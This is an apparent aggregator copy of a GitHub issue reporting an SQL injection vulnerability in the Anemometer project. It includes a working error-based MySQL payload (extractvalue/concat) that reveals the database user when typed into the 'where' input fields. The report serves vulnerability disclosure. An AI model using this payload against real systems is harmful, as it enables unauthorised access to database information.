box / box/Anemometer

There is a SQL inject vulnerability

Open
#210 0 comments 1 reaction 0 assignees View on GitHub
Dominant language
JavaScript
Stars
1.4k
Forks
306
PR merge metrics
No merged PRs in 30d

Description

Just try
```
1=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
```
in where input fields.
so i can get the user of mysql database.

Contributor guide

Open the contributing guide

Assessment

This issue has not been assessed yet.

Get new issues in your inbox

A short digest of beginner-friendly GitHub issues.